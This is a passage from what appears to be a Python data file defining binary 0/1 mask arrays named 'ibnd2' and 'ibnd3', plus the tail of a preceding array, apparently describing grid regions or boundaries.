0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0,
0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
ibnd2 = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0,
0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0,
0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0,
0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0,
0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
ibnd3 = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0,
0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0,
0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0,
0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0,
0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0,
